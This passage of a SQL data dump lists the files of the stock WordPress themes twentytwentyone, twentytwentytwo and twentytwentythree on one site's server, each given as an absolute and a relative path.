wentytwentyone/classes/class-twenty-twenty-one-customize.php'),(13539,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-dark-mode.php','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-dark-mode.php'),(13540,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-svg-icons.php','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-svg-icons.php'),(13541,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/comments.php','wp-content/themes/twentytwentyone/comments.php'),(13542,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/footer.php','wp-content/themes/twentytwentyone/footer.php'),(13543,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/functions.php','wp-content/themes/twentytwentyone/functions.php'),(13544,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/header.php','wp-content/themes/twentytwentyone/header.php'),(13545,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/image.php','wp-content/themes/twentytwentyone/image.php'),(13546,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/inc/back-compat.php','wp-content/themes/twentytwentyone/inc/back-compat.php'),(13547,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/inc/block-patterns.php','wp-content/themes/twentytwentyone/inc/block-patterns.php'),(13548,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/inc/block-styles.php','wp-content/themes/twentytwentyone/inc/block-styles.php'),(13549,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/inc/custom-css.php','wp-content/themes/twentytwentyone/inc/custom-css.php'),(13550,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/inc/menu-functions.php','wp-content/themes/twentytwentyone/inc/menu-functions.php'),(13551,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/inc/starter-content.php','wp-content/themes/twentytwentyone/inc/starter-content.php'),(13552,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/inc/template-functions.php','wp-content/themes/twentytwentyone/inc/template-functions.php'),(13553,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/inc/template-tags.php','wp-content/themes/twentytwentyone/inc/template-tags.php'),(13554,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/index.php','wp-content/themes/twentytwentyone/index.php'),(13555,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/package-lock.json','wp-content/themes/twentytwentyone/package-lock.json'),(13556,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/package.json','wp-content/themes/twentytwentyone/package.json'),(13557,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/page.php','wp-content/themes/twentytwentyone/page.php'),(13558,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/postcss.config.js','wp-content/themes/twentytwentyone/postcss.config.js'),(13559,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/readme.txt','wp-content/themes/twentytwentyone/readme.txt'),(13560,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/screenshot.png','wp-content/themes/twentytwentyone/screenshot.png'),(13561,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/search.php','wp-content/themes/twentytwentyone/search.php'),(13562,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/searchform.php','wp-content/themes/twentytwentyone/searchform.php'),(13563,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/single.php','wp-content/themes/twentytwentyone/single.php'),(13564,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/style-rtl.css','wp-content/themes/twentytwentyone/style-rtl.css'),(13565,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/style.css','wp-content/themes/twentytwentyone/style.css'),(13566,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/content/content-excerpt.php','wp-content/themes/twentytwentyone/template-parts/content/content-excerpt.php'),(13567,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/content/content-none.php','wp-content/themes/twentytwentyone/template-parts/content/content-none.php'),(13568,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/content/content-page.php','wp-content/themes/twentytwentyone/template-parts/content/content-page.php'),(13569,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/content/content-single.php','wp-content/themes/twentytwentyone/template-parts/content/content-single.php'),(13570,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/content/content.php','wp-content/themes/twentytwentyone/template-parts/content/content.php'),(13571,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-aside.php','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-aside.php'),(13572,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-audio.php','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-audio.php'),(13573,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-chat.php','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-chat.php'),(13574,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-gallery.php','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-gallery.php'),(13575,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-image.php','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-image.php'),(13576,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-link.php','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-link.php'),(13577,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-quote.php','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-quote.php'),(13578,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-status.php','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-status.php'),(13579,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-video.php','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-video.php'),(13580,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt.php','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt.php'),(13581,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/footer/footer-widgets.php','wp-content/themes/twentytwentyone/template-parts/footer/footer-widgets.php'),(13582,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/header/entry-header.php','wp-content/themes/twentytwentyone/template-parts/header/entry-header.php'),(13583,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/header/excerpt-header.php','wp-content/themes/twentytwentyone/template-parts/header/excerpt-header.php'),(13584,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/header/site-branding.php','wp-content/themes/twentytwentyone/template-parts/header/site-branding.php'),(13585,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/header/site-header.php','wp-content/themes/twentytwentyone/template-parts/header/site-header.php'),(13586,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/header/site-nav.php','wp-content/themes/twentytwentyone/template-parts/header/site-nav.php'),(13587,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentyone/template-parts/post/author-bio.php','wp-content/themes/twentytwentyone/template-parts/post/author-bio.php'),(13588,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Bold-Italic.woff2','wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Bold-Italic.woff2'),(13589,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Bold.woff2','wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Bold.woff2'),(13590,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Regular-Italic.woff2','wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Regular-Italic.woff2'),(13591,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Regular.woff2','wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Regular.woff2'),(13592,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/assets/fonts/dm-sans/LICENSE.txt','wp-content/themes/twentytwentythree/assets/fonts/dm-sans/LICENSE.txt'),(13593,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/IBMPlexMono-Bold.woff2','wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/IBMPlexMono-Bold.woff2'),(13594,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/IBMPlexMono-Italic.woff2','wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/IBMPlexMono-Italic.woff2'),(13595,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/IBMPlexMono-Light.woff2','wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/IBMPlexMono-Light.woff2'),(13596,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/IBMPlexMono-Regular.woff2','wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/IBMPlexMono-Regular.woff2'),(13597,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/OFL.txt','wp-content/themes/twentytwentythree/assets/fonts/ibm-plex-mono/OFL.txt'),(13598,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/assets/fonts/inter/Inter-VariableFont_slnt,wght.ttf','wp-content/themes/twentytwentythree/assets/fonts/inter/Inter-VariableFont_slnt,wght.ttf'),(13599,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/assets/fonts/inter/LICENSE.txt','wp-content/themes/twentytwentythree/assets/fonts/inter/LICENSE.txt'),(13600,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/LICENSE.md','wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/LICENSE.md'),(13601,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Italic.otf.woff2','wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Italic.otf.woff2'),(13602,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Italic.ttf.woff2','wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Italic.ttf.woff2'),(13603,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Roman.otf.woff2','wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Roman.otf.woff2'),(13604,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Roman.ttf.woff2','wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/SourceSerif4Variable-Roman.ttf.woff2'),(13605,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/parts/comments.html','wp-content/themes/twentytwentythree/parts/comments.html'),(13606,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/parts/footer.html','wp-content/themes/twentytwentythree/parts/footer.html'),(13607,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/parts/header.html','wp-content/themes/twentytwentythree/parts/header.html'),(13608,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/parts/post-meta.html','wp-content/themes/twentytwentythree/parts/post-meta.html'),(13609,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/patterns/call-to-action.php','wp-content/themes/twentytwentythree/patterns/call-to-action.php'),(13610,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/patterns/footer-default.php','wp-content/themes/twentytwentythree/patterns/footer-default.php'),(13611,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/patterns/hidden-404.php','wp-content/themes/twentytwentythree/patterns/hidden-404.php'),(13612,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/patterns/hidden-comments.php','wp-content/themes/twentytwentythree/patterns/hidden-comments.php'),(13613,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/patterns/hidden-no-results.php','wp-content/themes/twentytwentythree/patterns/hidden-no-results.php'),(13614,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/patterns/post-meta.php','wp-content/themes/twentytwentythree/patterns/post-meta.php'),(13615,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/readme.txt','wp-content/themes/twentytwentythree/readme.txt'),(13616,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/screenshot.png','wp-content/themes/twentytwentythree/screenshot.png'),(13617,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/style.css','wp-content/themes/twentytwentythree/style.css'),(13618,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/styles/aubergine.json','wp-content/themes/twentytwentythree/styles/aubergine.json'),(13619,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/styles/block-out.json','wp-content/themes/twentytwentythree/styles/block-out.json'),(13620,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/styles/canary.json','wp-content/themes/twentytwentythree/styles/canary.json'),(13621,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/styles/electric.json','wp-content/themes/twentytwentythree/styles/electric.json'),(13622,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/styles/grapes.json','wp-content/themes/twentytwentythree/styles/grapes.json'),(13623,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/styles/marigold.json','wp-content/themes/twentytwentythree/styles/marigold.json'),(13624,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/styles/pilgrimage.json','wp-content/themes/twentytwentythree/styles/pilgrimage.json'),(13625,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/styles/pitch.json','wp-content/themes/twentytwentythree/styles/pitch.json'),(13626,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/styles/sherbet.json','wp-content/themes/twentytwentythree/styles/sherbet.json'),(13627,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/styles/whisper.json','wp-content/themes/twentytwentythree/styles/whisper.json'),(13628,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/templates/404.html','wp-content/themes/twentytwentythree/templates/404.html'),(13629,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/templates/archive.html','wp-content/themes/twentytwentythree/templates/archive.html'),(13630,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/templates/blank.html','wp-content/themes/twentytwentythree/templates/blank.html'),(13631,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/templates/blog-alternative.html','wp-content/themes/twentytwentythree/templates/blog-alternative.html'),(13632,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/templates/home.html','wp-content/themes/twentytwentythree/templates/home.html'),(13633,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/templates/index.html','wp-content/themes/twentytwentythree/templates/index.html'),(13634,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/templates/page.html','wp-content/themes/twentytwentythree/templates/page.html'),(13635,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/templates/search.html','wp-content/themes/twentytwentythree/templates/search.html'),(13636,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/templates/single.html','wp-content/themes/twentytwentythree/templates/single.html'),(13637,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentythree/theme.json','wp-content/themes/twentytwentythree/theme.json'),(13638,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.otf.woff2','wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.otf.woff2'),(13639,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2','wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2'),(13640,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.otf.woff2','wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.otf.woff2'),(13641,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2','wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2'),(13642,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/dm-sans/DMSans-Bold.ttf','wp-content/themes/twentytwentytwo/assets/fonts/dm-sans/DMSans-Bold.ttf'),(13643,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/dm-sans/DMSans-BoldItalic.ttf','wp-content/themes/twentytwentytwo/assets/fonts/dm-sans/DMSans-BoldItalic.ttf'),(13644,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/dm-sans/DMSans-Italic.ttf','wp-content/themes/twentytwentytwo/assets/fonts/dm-sans/DMSans-Italic.ttf'),(13645,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/dm-sans/DMSans-Regular.ttf','wp-content/themes/twentytwentytwo/assets/fonts/dm-sans/DMSans-Regular.ttf'),(13646,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/dm-sans/LICENSE.txt','wp-content/themes/twentytwentytwo/assets/fonts/dm-sans/LICENSE.txt'),(13647,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/ibm-plex/IBMPlexMono-Bold.woff2','wp-content/themes/twentytwentytwo/assets/fonts/ibm-plex/IBMPlexMono-Bold.woff2'),(13648,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/ibm-plex/IBMPlexMono-BoldItalic.woff2','wp-content/themes/twentytwentytwo/assets/fonts/ibm-plex/IBMPlexMono-BoldItalic.woff2'),(13649,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/ibm-plex/IBMPlexMono-Text.woff2','wp-content/themes/twentytwentytwo/assets/fonts/ibm-plex/IBMPlexMono-Text.woff2'),(13650,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/ibm-plex/IBMPlexMono-TextItalic.woff2','wp-content/themes/twentytwentytwo/assets/fonts/ibm-plex/IBMPlexMono-TextItalic.woff2'),(13651,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/ibm-plex/IBMPlexSans-ExtraLight.woff2','wp-content/themes/twentytwentytwo/assets/fonts/ibm-plex/IBMPlexSans-ExtraLight.woff2'),(13652,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/ibm-plex/IBMPlexSans-ExtraLightItalic.woff2','wp-content/themes/twentytwentytwo/assets/fonts/ibm-plex/IBMPlexSans-ExtraLightItalic.woff2'),(13653,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/ibm-plex/IBMPlexSans-Light.woff2','wp-content/themes/twentytwentytwo/assets/fonts/ibm-plex/IBMPlexSans-Light.woff2'),(13654,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/ibm-plex/IBMPlexSans-LightItalic.woff2','wp-content/themes/twentytwentytwo/assets/fonts/ibm-plex/IBMPlexSans-LightItalic.woff2'),(13655,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/ibm-plex/LICENSE.txt','wp-content/themes/twentytwentytwo/assets/fonts/ibm-plex/LICENSE.txt'),(13656,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/inter/Inter.ttf','wp-content/themes/twentytwentytwo/assets/fonts/inter/Inter.ttf'),(13657,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/inter/LICENSE.txt','wp-content/themes/twentytwentytwo/assets/fonts/inter/LICENSE.txt'),(13658,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/source-serif-pro/LICENSE.md','wp-content/themes/twentytwentytwo/assets/fonts/source-serif-pro/LICENSE.md'),(13659,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/source-serif-pro/SourceSerif4Variable-Italic.otf.woff2','wp-content/themes/twentytwentytwo/assets/fonts/source-serif-pro/SourceSerif4Variable-Italic.otf.woff2'),(13660,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/source-serif-pro/SourceSerif4Variable-Italic.ttf.woff2','wp-content/themes/twentytwentytwo/assets/fonts/source-serif-pro/SourceSerif4Variable-Italic.ttf.woff2'),(13661,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/source-serif-pro/SourceSerif4Variable-Roman.otf.woff2','wp-content/themes/twentytwentytwo/assets/fonts/source-serif-pro/SourceSerif4Variable-Roman.otf.woff2'),(13662,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/fonts/source-serif-pro/SourceSerif4Variable-Roman.ttf.woff2','wp-content/themes/twentytwentytwo/assets/fonts/source-serif-pro/SourceSerif4Variable-Roman.ttf.woff2'),(13663,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/images/bird-on-black.jpg','wp-content/themes/twentytwentytwo/assets/images/bird-on-black.jpg'),(13664,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/images/bird-on-gray.jpg','wp-content/themes/twentytwentytwo/assets/images/bird-on-gray.jpg'),(13665,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/images/bird-on-green.jpg','wp-content/themes/twentytwentytwo/assets/images/bird-on-green.jpg'),(13666,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/images/bird-on-salmon.jpg','wp-content/themes/twentytwentytwo/assets/images/bird-on-salmon.jpg'),(13667,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/images/divider-black.png','wp-content/themes/twentytwentytwo/assets/images/divider-black.png'),(13668,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/images/divider-white.png','wp-content/themes/twentytwentytwo/assets/images/divider-white.png'),(13669,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/images/ducks.jpg','wp-content/themes/twentytwentytwo/assets/images/ducks.jpg'),(13670,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/images/flight-path-on-gray-a.jpg','wp-content/themes/twentytwentytwo/assets/images/flight-path-on-gray-a.jpg'),(13671,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/images/flight-path-on-gray-b.jpg','wp-content/themes/twentytwentytwo/assets/images/flight-path-on-gray-b.jpg'),(13672,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/images/flight-path-on-gray-c.jpg','wp-content/themes/twentytwentytwo/assets/images/flight-path-on-gray-c.jpg'),(13673,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/images/flight-path-on-salmon.jpg','wp-content/themes/twentytwentytwo/assets/images/flight-path-on-salmon.jpg'),(13674,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/images/flight-path-on-transparent-a.png','wp-content/themes/twentytwentytwo/assets/images/flight-path-on-transparent-a.png'),(13675,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/images/flight-path-on-transparent-b.png','wp-content/themes/twentytwentytwo/assets/images/flight-path-on-transparent-b.png'),(13676,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/images/flight-path-on-transparent-c.png','wp-content/themes/twentytwentytwo/assets/images/flight-path-on-transparent-c.png'),(13677,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/images/flight-path-on-transparent-d.png','wp-content/themes/twentytwentytwo/assets/images/flight-path-on-transparent-d.png'),(13678,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/images/icon-binoculars.png','wp-content/themes/twentytwentytwo/assets/images/icon-binoculars.png'),(13679,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/images/icon-bird.jpg','wp-content/themes/twentytwentytwo/assets/images/icon-bird.jpg'),(13680,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/assets/videos/birds.mp4','wp-content/themes/twentytwentytwo/assets/videos/birds.mp4'),(13681,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/functions.php','wp-content/themes/twentytwentytwo/functions.php'),(13682,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/block-patterns.php','wp-content/themes/twentytwentytwo/inc/block-patterns.php'),(13683,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/footer-about-title-logo.php','wp-content/themes/twentytwentytwo/inc/patterns/footer-about-title-logo.php'),(13684,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/footer-blog.php','wp-content/themes/twentytwentytwo/inc/patterns/footer-blog.php'),(13685,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/footer-dark.php','wp-content/themes/twentytwentytwo/inc/patterns/footer-dark.php'),(13686,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/footer-default.php','wp-content/themes/twentytwentytwo/inc/patterns/footer-default.php'),(13687,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/footer-logo.php','wp-content/themes/twentytwentytwo/inc/patterns/footer-logo.php'),(13688,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/footer-navigation-copyright.php','wp-content/themes/twentytwentytwo/inc/patterns/footer-navigation-copyright.php'),(13689,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/footer-navigation.php','wp-content/themes/twentytwentytwo/inc/patterns/footer-navigation.php'),(13690,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/footer-query-images-title-citation.php','wp-content/themes/twentytwentytwo/inc/patterns/footer-query-images-title-citation.php'),(13691,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/footer-query-title-citation.php','wp-content/themes/twentytwentytwo/inc/patterns/footer-query-title-citation.php'),(13692,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/footer-social-copyright.php','wp-content/themes/twentytwentytwo/inc/patterns/footer-social-copyright.php'),(13693,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/footer-title-tagline-social.php','wp-content/themes/twentytwentytwo/inc/patterns/footer-title-tagline-social.php'),(13694,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/general-divider-dark.php','wp-content/themes/twentytwentytwo/inc/patterns/general-divider-dark.php'),(13695,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/general-divider-light.php','wp-content/themes/twentytwentytwo/inc/patterns/general-divider-light.php'),(13696,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/general-featured-posts.php','wp-content/themes/twentytwentytwo/inc/patterns/general-featured-posts.php'),(13697,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/general-image-with-caption.php','wp-content/themes/twentytwentytwo/inc/patterns/general-image-with-caption.php'),(13698,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/general-large-list-names.php','wp-content/themes/twentytwentytwo/inc/patterns/general-large-list-names.php'),(13699,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/general-layered-images-with-duotone.php','wp-content/themes/twentytwentytwo/inc/patterns/general-layered-images-with-duotone.php'),(13700,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/general-list-events.php','wp-content/themes/twentytwentytwo/inc/patterns/general-list-events.php'),(13701,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentytwentytwo/inc/patterns/general-pricing-table.php','wp-content/themes/twentytwentytwo/